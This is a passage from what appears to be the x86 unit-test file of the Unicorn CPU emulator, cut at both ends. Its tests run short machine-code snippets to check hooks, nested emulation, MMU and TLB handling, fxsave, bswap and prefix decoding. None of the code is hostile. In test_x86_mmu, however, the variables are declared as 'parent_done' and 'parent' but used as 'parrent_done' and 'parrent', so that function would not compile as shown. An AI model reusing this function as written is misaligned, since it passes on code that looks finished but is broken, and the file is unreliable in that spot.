OK(uc_emu_start(uc, code_start, code_start + 8, 0, 0)); // If tb cache is not cleared, edx would be still 0x7890 OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } typedef struct _HOOK_TCG_OP_RESULT { uint64_t address; uint64_t arg1; uint64_t arg2; } HOOK_TCG_OP_RESULT; typedef struct _HOOK_TCG_OP_RESULTS { HOOK_TCG_OP_RESULT results[128]; uint64_t len; } HOOK_TCG_OP_RESULTS; static void test_x86_hook_tcg_op_cb(uc_engine *uc, uint64_t address, uint64_t arg1, uint64_t arg2, uint32_t size, void *data) { HOOK_TCG_OP_RESULTS *results = (HOOK_TCG_OP_RESULTS *)data; HOOK_TCG_OP_RESULT *result = &results->results[results->len++]; result->address = address; result->arg1 = arg1; result->arg2 = arg2; } static void test_x86_hook_tcg_op(void) { uc_engine *uc; uc_hook h; int flag; HOOK_TCG_OP_RESULTS results; // sub esi, [0x1000]; // sub eax, ebx; // sub eax, 1; // cmp eax, 0; // cmp ebx, edx; // cmp esi, [0x1000]; char code[] = "\x2b\x35\x00\x10\x00\x00\x29\xd8\x83\xe8\x01\x83\xf8\x00\x39" "\xd3\x3b\x35\x00\x10\x00\x00"; int r_eax = 0x1234; int r_ebx = 2; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_reg_write(uc, UC_X86_REG_EBX, &r_ebx)); memset(&results, 0, sizeof(HOOK_TCG_OP_RESULTS)); flag = 0; OK(uc_hook_add(uc, &h, UC_HOOK_TCG_OPCODE, test_x86_hook_tcg_op_cb, &results, 0, -1, UC_TCG_OP_SUB, flag)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_hook_del(uc, h)); TEST_CHECK(results.len == 6); memset(&results, 0, sizeof(HOOK_TCG_OP_RESULTS)); flag = UC_TCG_OP_FLAG_DIRECT; OK(uc_hook_add(uc, &h, UC_HOOK_TCG_OPCODE, test_x86_hook_tcg_op_cb, &results, 0, -1, UC_TCG_OP_SUB, flag)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_hook_del(uc, h)); TEST_CHECK(results.len == 3); memset(&results, 0, sizeof(HOOK_TCG_OP_RESULTS)); flag = UC_TCG_OP_FLAG_CMP; OK(uc_hook_add(uc, &h, UC_HOOK_TCG_OPCODE, test_x86_hook_tcg_op_cb, &results, 0, -1, UC_TCG_OP_SUB, flag)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_hook_del(uc, h)); TEST_CHECK(results.len == 3); OK(uc_close(uc)); } static bool test_x86_cmpxchg_mem_hook(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t val, void *data) { if (type == UC_MEM_READ) { *((int *)data) |= 1; } else { *((int *)data) |= 2; } return true; } static void test_x86_cmpxchg(void) { uc_engine *uc; char code[] = "\x0F\xC7\x0D\xE0\xBE\xAD\xDE"; // cmpxchg8b [0xdeadbee0] int r_zero = 0; int r_aaaa = 0x41414141; uint64_t mem; uc_hook h; int result = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0xdeadb000, 0x1000, UC_PROT_ALL)); OK(uc_hook_add(uc, &h, UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, test_x86_cmpxchg_mem_hook, &result, 1, 0)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_zero)); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_zero)); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_aaaa)); OK(uc_reg_write(uc, UC_X86_REG_EBX, &r_aaaa)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_mem_read(uc, 0xdeadbee0, &mem, 8)); TEST_CHECK(mem == 0x4141414141414141); // Both read and write happened. 
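// (bit 0 was set by the read callback, bit 1 by the write callback)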
TEST_CHECK(result == 3); OK(uc_close(uc)); } static void test_x86_nested_emu_start_cb(uc_engine *uc, uint64_t addr, size_t size, void *data) { OK(uc_emu_start(uc, code_start + 1, code_start + 2, 0, 0)); } static void test_x86_nested_emu_start(void) { uc_engine *uc; char code[] = "\x41\x4a"; // INC ecx; DEC edx; int r_ecx = 0x1234; int r_edx = 0x7890; uc_hook h; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); // Emulate DEC in the nested hook. OK(uc_hook_add(uc, &h, UC_HOOK_CODE, test_x86_nested_emu_start_cb, NULL, code_start, code_start)); // Emulate INC OK(uc_emu_start(uc, code_start, code_start + 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1235); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_nested_emu_stop_cb(uc_engine *uc, uint64_t addr, size_t size, void *data) { OK(uc_emu_start(uc, code_start + 1, code_start + 2, 0, 0)); // ecx shouldn't be changed! OK(uc_emu_stop(uc)); } static void test_x86_nested_emu_stop(void) { uc_engine *uc; // INC ecx; DEC edx; DEC edx; char code[] = "\x41\x4a\x4a"; int r_ecx = 0x1234; int r_edx = 0x7890; uc_hook h; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_write(uc, UC_X86_REG_EDX, &r_edx)); // Emulate DEC in the nested hook. OK(uc_hook_add(uc, &h, UC_HOOK_CODE, test_x86_nested_emu_stop_cb, NULL, code_start, code_start)); OK(uc_emu_start(uc, code_start, code_start + 3, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx)); OK(uc_reg_read(uc, UC_X86_REG_EDX, &r_edx)); TEST_CHECK(r_ecx == 0x1234); TEST_CHECK(r_edx == 0x788f); OK(uc_close(uc)); } static void test_x86_nested_emu_start_error_cb(uc_engine *uc, uint64_t addr, size_t size, void *data) { uc_assert_err(UC_ERR_READ_UNMAPPED, uc_emu_start(uc, code_start + 2, 0, 0, 0)); } static void test_x86_64_nested_emu_start_error(void) { uc_engine *uc; // "nop;nop;mov rax, [0x10000]" char code[] = "\x90\x90\x48\xa1\x00\x00\x01\x00\x00\x00\x00\x00"; uc_hook hk; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk, UC_HOOK_CODE, test_x86_nested_emu_start_error_cb, NULL, code_start, code_start)); // This call shouldn't fail! 
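// The nested uc_emu_start() fails with UC_ERR_READ_UNMAPPED inside the hook; that error must not leak into this outer call.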
OK(uc_emu_start(uc, code_start, code_start + 2, 0, 0)); OK(uc_close(uc)); } static void test_x86_eflags_reserved_bit(void) { uc_engine *uc; uint32_t r_eflags; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_reg_read(uc, UC_X86_REG_EFLAGS, &r_eflags)); TEST_CHECK((r_eflags & 2) != 0); OK(uc_reg_write(uc, UC_X86_REG_EFLAGS, &r_eflags)); OK(uc_reg_read(uc, UC_X86_REG_EFLAGS, &r_eflags)); TEST_CHECK((r_eflags & 2) != 0); OK(uc_close(uc)); } static void test_x86_nested_uc_emu_start_exits_cb(uc_engine *uc, uint64_t addr, size_t size, void *data) { OK(uc_emu_start(uc, code_start + 5, code_start + 6, 0, 0)); } static void test_x86_nested_uc_emu_start_exits(void) { uc_engine *uc; // cmp eax, 0 // jnz t // nop <-- nested emu_start // t:mov dword ptr [eax], 0 char code[] = "\x83\xf8\x00\x75\x01\x90\xc7\x00\x00\x00\x00\x00"; uc_hook hk; uint32_t r_pc; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk, UC_HOOK_CODE, test_x86_nested_uc_emu_start_exits_cb, NULL, code_start, code_start)); OK(uc_emu_start(uc, code_start, code_start + 5, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_pc)); TEST_CHECK(r_pc == code_start + 5); OK(uc_close(uc)); } static bool test_x86_correct_address_in_small_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_rax = 0x0; uint64_t r_rip = 0x0; OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &r_rip)); TEST_CHECK(r_rax == 0x7F00); TEST_CHECK(r_rip == 0x7F00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7F00); return false; } static void test_x86_correct_address_in_small_jump_hook(void) { uc_engine *uc; // movabs $0x7F00, %rax // jmp *%rax char code[] = "\x48\xb8\x00\x7F\x00\x00\x00\x00\x00\x00\xff\xe0"; uint64_t r_rax = 0x0; uint64_t r_rip = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_x86_correct_address_in_small_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &r_rip)); TEST_CHECK(r_rax == 0x7F00); TEST_CHECK(r_rip == 0x7F00); OK(uc_close(uc)); } static bool test_x86_correct_address_in_long_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_rax = 0x0; uint64_t r_rip = 0x0; OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &r_rip)); TEST_CHECK(r_rax == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_rip == 0x7FFFFFFFFFFFFF00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7FFFFFFFFFFFFF00); return false; } static void test_x86_correct_address_in_long_jump_hook(void) { uc_engine *uc; // movabs $0x7FFFFFFFFFFFFF00, %rax // jmp *%rax char code[] = "\x48\xb8\x00\xff\xff\xff\xff\xff\xff\x7f\xff\xe0"; uint64_t r_rax = 0x0; uint64_t r_rip = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_x86_correct_address_in_long_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_RAX, &r_rax)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &r_rip)); TEST_CHECK(r_rax == 0x7FFFFFFFFFFFFF00); 
TEST_CHECK(r_rip == 0x7FFFFFFFFFFFFF00); OK(uc_close(uc)); } static void test_x86_invalid_vex_l(void) { uc_engine *uc; /* vmovdqu ymm1, [rcx] */ char code[] = {'\xC5', '\xFE', '\x6F', '\x09'}; /* initialize memory and run emulation */ OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0, 2 * 1024 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); uc_assert_err(UC_ERR_INSN_INVALID, uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0)); OK(uc_close(uc)); } // AARCH64 inline the read while s390x won't split the access. Though not tested // on other hosts but we restrict a bit more. #if !defined(TARGET_READ_INLINED) && defined(BOOST_LITTLE_ENDIAN) struct writelog_t { uint32_t addr, size; }; static void test_x86_unaligned_access_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { TEST_CHECK(size != 0); struct writelog_t *write_log = (struct writelog_t *)user_data; for (int i = 0; i < 10; i++) { if (write_log[i].size == 0) { write_log[i].addr = (uint32_t)address; write_log[i].size = (uint32_t)size; return; } } TEST_ASSERT(false); } static void test_x86_unaligned_access(void) { uc_engine *uc; uc_hook hook; // mov dword ptr [0x200001], eax; mov eax, dword ptr [0x200001] char code[] = "\xa3\x01\x00\x20\x00\xa1\x01\x00\x20\x00"; uint32_t r_eax = LEINT32(0x41424344); struct writelog_t write_log[10]; struct writelog_t read_log[10]; memset(write_log, 0, sizeof(write_log)); memset(read_log, 0, sizeof(read_log)); uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x200000, 0x1000, UC_PROT_ALL)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_WRITE, test_x86_unaligned_access_callback, write_log, 1, 0)); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_READ, test_x86_unaligned_access_callback, read_log, 1, 0)); OK(uc_reg_write(uc, UC_X86_REG_EAX, &r_eax)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); TEST_CHECK(write_log[0].addr == 0x200001); TEST_CHECK(write_log[0].size == 4); TEST_CHECK(write_log[1].size == 0); TEST_CHECK(read_log[0].addr == 0x200001); TEST_CHECK(read_log[0].size == 4); TEST_CHECK(read_log[1].size == 0); char b; OK(uc_mem_read(uc, 0x200001, &b, 1)); TEST_CHECK(b == 0x44); OK(uc_mem_read(uc, 0x200002, &b, 1)); TEST_CHECK(b == 0x43); OK(uc_mem_read(uc, 0x200003, &b, 1)); TEST_CHECK(b == 0x42); OK(uc_mem_read(uc, 0x200004, &b, 1)); TEST_CHECK(b == 0x41); OK(uc_close(uc)); } #endif static bool test_x86_lazy_mapping_mem_callback(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x1000, "\x90\x90", 2)); // nop; nop // Handled! 
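// Returning true reports the unmapped fetch as handled, so Unicorn retries it against the newly mapped page.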
return true; } static void test_x86_lazy_mapping_block_callback(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { int *block_count = (int *)user_data; (*block_count)++; } static void test_x86_lazy_mapping(void) { uc_engine *uc; uc_hook mem_hook, block_hook; int block_count = 0; OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_hook_add(uc, &mem_hook, UC_HOOK_MEM_FETCH_UNMAPPED, test_x86_lazy_mapping_mem_callback, NULL, 1, 0)); OK(uc_hook_add(uc, &block_hook, UC_HOOK_BLOCK, test_x86_lazy_mapping_block_callback, &block_count, 1, 0)); OK(uc_emu_start(uc, 0x1000, 0x1002, 0, 0)); TEST_CHECK(block_count == 1); OK(uc_close(uc)); } static void test_x86_16_incorrect_ip_cb(uc_engine *uc, uint64_t address, uint32_t size, void *data) { uint16_t cs, ip; OK(uc_reg_read(uc, UC_X86_REG_CS, &cs)); OK(uc_reg_read(uc, UC_X86_REG_IP, &ip)); TEST_CHECK(cs == 0x20); TEST_CHECK(address == ((cs << 4) + ip)); } static void test_x86_16_incorrect_ip(void) { uc_engine *uc; uc_hook hk1, hk2; uint16_t cs = 0x20; char code[] = "\x41"; // INC cx; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_16, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk1, UC_HOOK_BLOCK, test_x86_16_incorrect_ip_cb, NULL, 1, 0)); OK(uc_hook_add(uc, &hk2, UC_HOOK_CODE, test_x86_16_incorrect_ip_cb, NULL, 1, 0)); OK(uc_reg_write(uc, UC_X86_REG_CS, &cs)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_x86_mmu_prepare_tlb(uc_engine *uc, uint64_t vaddr, uint64_t tlb_base) { uint64_t cr0; uint64_t cr4; uc_x86_msr msr = {.rid = 0x0c0000080, .value = 0}; uint64_t pml4o = ((vaddr & 0x00ff8000000000) >> 39) * 8; uint64_t pdpo = ((vaddr & 0x00007fc0000000) >> 30) * 8; uint64_t pdo = ((vaddr & 0x0000003fe00000) >> 21) * 8; uint64_t pml4e = (tlb_base + 0x1000) | 1 | (1 << 2); uint64_t pdpe = (tlb_base + 0x2000) | 1 | (1 << 2); uint64_t pde = (tlb_base + 0x3000) | 1 | (1 << 2); OK(uc_mem_write(uc, tlb_base + pml4o, &pml4e, sizeof(pml4o))); OK(uc_mem_write(uc, tlb_base + 0x1000 + pdpo, &pdpe, sizeof(pdpe))); OK(uc_mem_write(uc, tlb_base + 0x2000 + pdo, &pde, sizeof(pde))); OK(uc_reg_write(uc, UC_X86_REG_CR3, &tlb_base)); OK(uc_reg_read(uc, UC_X86_REG_CR0, &cr0)); OK(uc_reg_read(uc, UC_X86_REG_CR4, &cr4)); OK(uc_reg_read(uc, UC_X86_REG_MSR, &msr)); cr0 |= 1; cr0 |= 1l << 31; cr4 |= 1l << 5; msr.value |= 1l << 8; OK(uc_reg_write(uc, UC_X86_REG_CR0, &cr0)); OK(uc_reg_write(uc, UC_X86_REG_CR4, &cr4)); OK(uc_reg_write(uc, UC_X86_REG_MSR, &msr)); } static void test_x86_mmu_pt_set(uc_engine *uc, uint64_t vaddr, uint64_t paddr, uint64_t tlb_base) { uint64_t pto = ((vaddr & 0x000000001ff000) >> 12) * 8; uint32_t pte = (paddr) | 1 | (1 << 2); uc_mem_write(uc, tlb_base + 0x3000 + pto, &pte, sizeof(pte)); } static void test_x86_mmu_callback(uc_engine *uc, void *userdata) { bool *parent_done = userdata; uint64_t rax; OK(uc_reg_read(uc, UC_X86_REG_RAX, &rax)); switch (rax) { case 57: /* fork */ break; case 60: /* exit */ uc_emu_stop(uc); return; default: TEST_CHECK(false); } if (!(*parent_done)) { *parent_done = true; rax = 27; OK(uc_reg_write(uc, UC_X86_REG_RAX, &rax)); uc_emu_stop(uc); } } static void test_x86_mmu(void) { bool parent_done = false; uint64_t tlb_base = 0x3000; uint64_t parent, child; uint64_t rax, rip; uc_context *context; uc_engine *uc; uc_hook h1; /* * mov rax, 57 * syscall * test rax, rax * jz child * xor rax, rax * mov rax, 60 * mov [0x4000], rax * syscall * * child: * xor rcx, rcx * mov rcx, 42 * mov [0x4000], rcx * mov rax, 60 * syscall */ char code[] =
"\xB8\x39\x00\x00\x00\x0F\x05\x48\x85\xC0\x74\x0F\xB8\x3C\x00\x00\x00" "\x48\x89\x04\x25\x00\x40\x00\x00\x0F\x05\xB9\x2A\x00\x00\x00\x48\x89" "\x0C\x25\x00\x40\x00\x00\xB8\x3C\x00\x00\x00\x0F\x05"; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_ctl_tlb_mode(uc, UC_TLB_CPU)); OK(uc_hook_add(uc, &h1, UC_HOOK_INSN, &test_x86_mmu_callback, &parrent_done, 1, 0, UC_X86_INS_SYSCALL)); OK(uc_context_alloc(uc, &context)); OK(uc_mem_map(uc, 0x0, 0x1000, UC_PROT_ALL)); // Code OK(uc_mem_write(uc, 0x0, code, sizeof(code) - 1)); OK(uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL)); // Parrent OK(uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL)); // Child OK(uc_mem_map(uc, tlb_base, 0x4000, UC_PROT_ALL)); // TLB test_x86_mmu_prepare_tlb(uc, 0x0, tlb_base); test_x86_mmu_pt_set(uc, 0x2000, 0x0, tlb_base); test_x86_mmu_pt_set(uc, 0x4000, 0x1000, tlb_base); OK(uc_ctl_flush_tlb(uc)); OK(uc_emu_start(uc, 0x2000, 0x0, 0, 0)); OK(uc_context_save(uc, context)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &rip)); OK(uc_emu_start(uc, rip, 0x0, 0, 0)); /* restore for child */ OK(uc_context_restore(uc, context)); test_x86_mmu_prepare_tlb(uc, 0x0, tlb_base); test_x86_mmu_pt_set(uc, 0x4000, 0x2000, tlb_base); rax = 0; OK(uc_reg_write(uc, UC_X86_REG_RAX, &rax)); OK(uc_ctl_flush_tlb(uc)); OK(uc_emu_start(uc, rip, 0x0, 0, 0)); OK(uc_mem_read(uc, 0x1000, &parrent, sizeof(parrent))); OK(uc_mem_read(uc, 0x2000, &child, sizeof(child))); TEST_CHECK(parrent == 60); TEST_CHECK(child == 42); } static bool test_x86_vtlb_callback(uc_engine *uc, uint64_t addr, uc_mem_type type, uc_tlb_entry *result, void *user_data) { result->paddr = addr; result->perms = UC_PROT_ALL; return true; } static void test_x86_vtlb(void) { uc_engine *uc; uc_hook hook; char code[] = "\xeb\x02\x90\x90\x90\x90\x90\x90"; // jmp 4; nop; nop; nop; // nop; nop; nop uint64_t r_eip = 0; uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL)); OK(uc_hook_add(uc, &hook, UC_HOOK_TLB_FILL, test_x86_vtlb_callback, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + 4, 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EIP, &r_eip)); TEST_CHECK(r_eip == code_start + 4); OK(uc_close(uc)); } static void test_x86_segmentation(void) { uc_engine *uc; uint64_t fs = 0x53; uc_x86_mmr gdtr = {0, 0xfffff8076d962000, 0x57, 0}; OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_reg_write(uc, UC_X86_REG_GDTR, &gdtr)); uc_assert_err(UC_ERR_EXCEPTION, uc_reg_write(uc, UC_X86_REG_FS, &fs)); } static void test_x86_0xff_lcall_callback(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { // do nothing return; } // This aborts prior to a7a5d187e77f7853755eff4768658daf8095c3b7 static void test_x86_0xff_lcall(void) { uc_engine *uc; uc_hook hk; const char code[] = "\xB8\x01\x00\x00\x00\xBB\x01\x00\x00\x00\xB9\x01\x00\x00\x00\xFF\xDD" "\xBA\x01\x00\x00\x00\xB8\x02\x00\x00\x00\xBB\x02\x00\x00\x00"; // Taken from #1842 // 0: b8 01 00 00 00 mov eax,0x1 // 5: bb 01 00 00 00 mov ebx,0x1 // a: b9 01 00 00 00 mov ecx,0x1 // f: ff (bad) // 10: dd ba 01 00 00 00 fnstsw WORD PTR [edx+0x1] // 16: b8 02 00 00 00 mov eax,0x2 // 1b: bb 02 00 00 00 mov ebx,0x2 uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_32, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk, UC_HOOK_CODE, test_x86_0xff_lcall_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_INSN_INVALID, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static bool test_x86_64_not_overwriting_tmp0_for_pc_update_cb( uc_engine *uc, uc_mem_type type, uint64_t address, int size, uint64_t 
value, void *user_data) { return true; } // https://github.com/unicorn-engine/unicorn/issues/1717 // https://github.com/unicorn-engine/unicorn/issues/1862 static void test_x86_64_not_overwriting_tmp0_for_pc_update(void) { uc_engine *uc; uc_hook hk; const char code[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x48\x89\x0c" "\x24\x48\xd3\x24\x24\x73\x0a"; uint64_t rsp, pc, eflags; // 0x1000: movabs rcx, 0xffffffffffffffff // 0x100a: mov qword ptr [rsp], rcx // 0x100e: shl qword ptr [rsp], cl ; (Shift to CF=1) // 0x1012: jae 0xd ; this jump should not be taken! (CF=1 but jae // expects CF=0) uc_common_setup(&uc, UC_ARCH_X86, UC_MODE_64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hk, UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, test_x86_64_not_overwriting_tmp0_for_pc_update_cb, NULL, 1, 0)); rsp = 0x2000; OK(uc_reg_write(uc, UC_X86_REG_RSP, (void *)&rsp)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 4)); OK(uc_reg_read(uc, UC_X86_REG_RIP, &pc)); OK(uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags)); TEST_CHECK(pc == 0x1014); TEST_CHECK((eflags & 0x1) == 1); OK(uc_close(uc)); } static void test_fxsave_fpip_x86(void) { // note: fxsave was introduced in Pentium II uint8_t code_x86[] = { // help testing through NOP offset [disassembly in at&t syntax] 0x90, 0x90, 0x90, 0x90, // nop nop nop nop // run a floating point instruction 0xdb, 0xc9, // fcmovne %st(1), %st // fxsave needs 512 bytes of storage space 0x81, 0xec, 0x00, 0x02, 0x00, 0x00, // subl $512, %esp // fxsave needs a 16-byte aligned address for storage 0x83, 0xe4, 0xf0, // andl $0xfffffff0, %esp // store fxsave data on the stack 0x0f, 0xae, 0x04, 0x24, // fxsave (%esp) // fxsave stores FPIP at an 8-byte offset, move FPIP to eax register 0x8b, 0x44, 0x24, 0x08 // movl 0x8(%esp), %eax }; uint32_t X86_NOP_OFFSET = 4; uint32_t stack_top = (uint32_t)MEM_STACK; uint32_t value; uc_engine *uc; // initialize emulator in X86-32bit mode OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); // map 1MB of memory for this emulation OK(uc_mem_map(uc, MEM_BASE, MEM_SIZE, UC_PROT_ALL)); OK(uc_mem_write(uc, MEM_TEXT, code_x86, sizeof(code_x86))); OK(uc_reg_write(uc, UC_X86_REG_ESP, &stack_top)); OK(uc_emu_start(uc, MEM_TEXT, MEM_TEXT + sizeof(code_x86), 0, 0)); OK(uc_reg_read(uc, UC_X86_REG_EAX, &value)); TEST_CHECK(value == ((uint32_t)MEM_TEXT + X86_NOP_OFFSET)); OK(uc_mem_unmap(uc, MEM_BASE, MEM_SIZE)); OK(uc_close(uc)); } static void test_fxsave_fpip_x64(void) { uint8_t code_x64[] = { // help testing through NOP offset [disassembly in at&t] 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, // nops // run a floating point instruction 0xdb, 0xc9, // fcmovne %st(1), %st // fxsave64 needs 512 bytes of storage space 0x48, 0x81, 0xec, 0x00, 0x02, 0x00, 0x00, // subq $512, %rsp // fxsave needs a 16-byte aligned address for storage 0x48, 0x83, 0xe4, 0xf0, // andq 0xfffffffffffffff0, %rsp // store fxsave64 data on the stack 0x48, 0x0f, 0xae, 0x04, 0x24, // fxsave64 (%rsp) // fxsave64 stores FPIP at an 8-byte offset, move FPIP to rax register 0x48, 0x8b, 0x44, 0x24, 0x08, // movq 0x8(%rsp), %rax }; uint64_t stack_top = (uint64_t)MEM_STACK; uint64_t X64_NOP_OFFSET = 8; uint64_t value; uc_engine *uc; // initialize emulator in X86-64bit mode OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); // map 1MB of memory for this emulation OK(uc_mem_map(uc, MEM_BASE, MEM_SIZE, UC_PROT_ALL)); OK(uc_mem_write(uc, MEM_TEXT, code_x64, sizeof(code_x64))); OK(uc_reg_write(uc, UC_X86_REG_RSP, &stack_top)); OK(uc_emu_start(uc, MEM_TEXT, MEM_TEXT + sizeof(code_x64), 0, 0)); OK(uc_reg_read(uc,
UC_X86_REG_RAX, &value)); TEST_CHECK(value == ((uint64_t)MEM_TEXT + X64_NOP_OFFSET)); OK(uc_mem_unmap(uc, MEM_BASE, MEM_SIZE)); OK(uc_close(uc)); } static void test_bswap_ax(void) { // References: // - https://gynvael.coldwind.pl/?id=268 // - https://github.com/JonathanSalwan/Triton/issues/1131 { uint8_t code[] = { // bswap ax 0x66, 0x0F, 0xC8, }; TEST_CODE(UC_MODE_32, code); TEST_IN_REG(EAX, 0x44332211); TEST_OUT_REG(EAX, 0x44330000); TEST_RUN(); } { uint8_t code[] = { // bswap ax 0x66, 0x0F, 0xC8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_OUT_REG(RAX, 0x8877665544330000); TEST_RUN(); } { uint8_t code[] = { // bswap rax (66h ignored) 0x66, 0x48, 0x0F, 0xC8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_OUT_REG(RAX, 0x1122334455667788); TEST_RUN(); } { uint8_t code[] = { // bswap ax (rex ignored) 0x48, 0x66, 0x0F, 0xC8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_OUT_REG(RAX, 0x8877665544330000); TEST_RUN(); } { uint8_t code[] = { // bswap eax 0x0F, 0xC8, }; TEST_CODE(UC_MODE_32, code); TEST_IN_REG(EAX, 0x44332211); TEST_OUT_REG(EAX, 0x11223344); TEST_RUN(); } { uint8_t code[] = { // bswap eax 0x0F, 0xC8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_OUT_REG(RAX, 0x0000000011223344); TEST_RUN(); } } static void test_rex_x64(void) { { uint8_t code[] = { // mov ax, bx (rex.w ignored) 0x48, 0x66, 0x89, 0xD8, }; TEST_CODE(UC_MODE_64, code); TEST_IN_REG(RAX, 0x8877665544332211); TEST_IN_REG(RBX, 0x1122334455667788); TEST_OUT_REG(RAX, 0x8877665544337788); TEST_RUN(); } { uint8_t code[] = { // mov rax, rbx (66h ignored) 0x66, 0x48, 0x89, 0xD8, }; TEST_CODE(UC_MODE_64, code); 